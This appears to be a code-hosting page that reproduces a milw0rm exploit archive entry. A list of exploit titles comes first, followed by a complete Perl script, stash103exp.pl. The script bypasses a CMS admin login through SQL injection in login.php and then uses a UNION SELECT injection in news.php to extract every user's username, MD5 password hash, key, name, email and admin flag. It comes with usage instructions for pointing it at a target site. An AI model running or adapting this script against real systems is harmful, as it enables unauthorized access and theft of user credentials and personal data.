
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
113 lines
2.8 KiB
Perl
Executable file
113 lines
2.8 KiB
Perl
Executable file
#!/usr/bin/perl -w
|
|
#
|
|
# User credentials disclosure exploit - stash103exp.pl
|
|
#
|
|
# Gnix <gnixmail@gmail.com>
|
|
# http://gnix.netsons.org
|
|
#
|
|
# This exploit use an SQL Injection in the file admin/login.php to
|
|
# bypass the login, and then an SQL Injection in the admin/news.php
|
|
# to extract all the users info. Note: password are crypted with md5.
|
|
#
|
|
# Output for each user:
|
|
# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin
|
|
#
|
|
|
|
use strict;
|
|
use LWP::UserAgent;
|
|
use HTTP::Request;
|
|
use HTTP::Response;
|
|
use HTTP::Cookies;
|
|
|
|
|
|
# Variables
|
|
my $cjar = new HTTP::Cookies( file => 'cookies.txt',
|
|
autosave => 1,
|
|
ignore_discard => 0);
|
|
my $agent = new LWP::UserAgent;
|
|
$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM');
|
|
|
|
|
|
# Check argv
|
|
if(@ARGV != 3) {
|
|
print "[?] Usage : perl stash103exp.pl <stash_dir_address> <admin_username> <table_prefix>\n";
|
|
print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n";
|
|
exit(1);
|
|
}
|
|
|
|
|
|
# Authentication
|
|
if(!auth($ARGV[0],$ARGV[1])) {
|
|
print "[!] Error during the authentication!\n";
|
|
exit(1);
|
|
}
|
|
|
|
|
|
# Extract all the user information
|
|
my $info = extract_data($ARGV[0],$ARGV[2]);
|
|
if(!$info) {
|
|
print "[!] Error when extracting data!\n";
|
|
exit(1);
|
|
}
|
|
|
|
|
|
# Print user information
|
|
$_ = $info;
|
|
my @users = m/<1>(.+?)<2>/g;
|
|
foreach my $user (@users) {
|
|
print $user."\n";
|
|
}
|
|
|
|
|
|
exit(0);
|
|
|
|
###########################################################################
|
|
|
|
|
|
|
|
# Login as $ARGV[1] and save the PHPSESSID cookie
|
|
sub auth
|
|
{
|
|
my $address = shift;
|
|
my $username= shift;
|
|
|
|
# Login
|
|
my $response= $agent->post($address.'admin/login.php',
|
|
{username => "' OR user_username = '$username",
|
|
password => "any",
|
|
submit => "Log in"});
|
|
|
|
# Save PHPSESSID cookie
|
|
$cjar->extract_cookies($response);
|
|
|
|
return $response->is_redirect();
|
|
}
|
|
|
|
|
|
|
|
# Inject a query through news.php to extract all the info about every user
|
|
sub extract_data
|
|
{
|
|
my $address = shift;
|
|
my $prefix = shift;
|
|
|
|
my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title, ".
|
|
"CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,".
|
|
"':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,".
|
|
"'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0 ".
|
|
"AS news_comment FROM ".$prefix."news, ".$prefix."user";
|
|
|
|
my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query);
|
|
|
|
$agent->cookie_jar($cjar);
|
|
my $response= $agent->request($request);
|
|
|
|
if($response->is_success()) {
|
|
return $response->content();
|
|
}
|
|
else {
|
|
return undef;
|
|
}
|
|
}
|
|
|
|
# milw0rm.com [2008-10-09]
|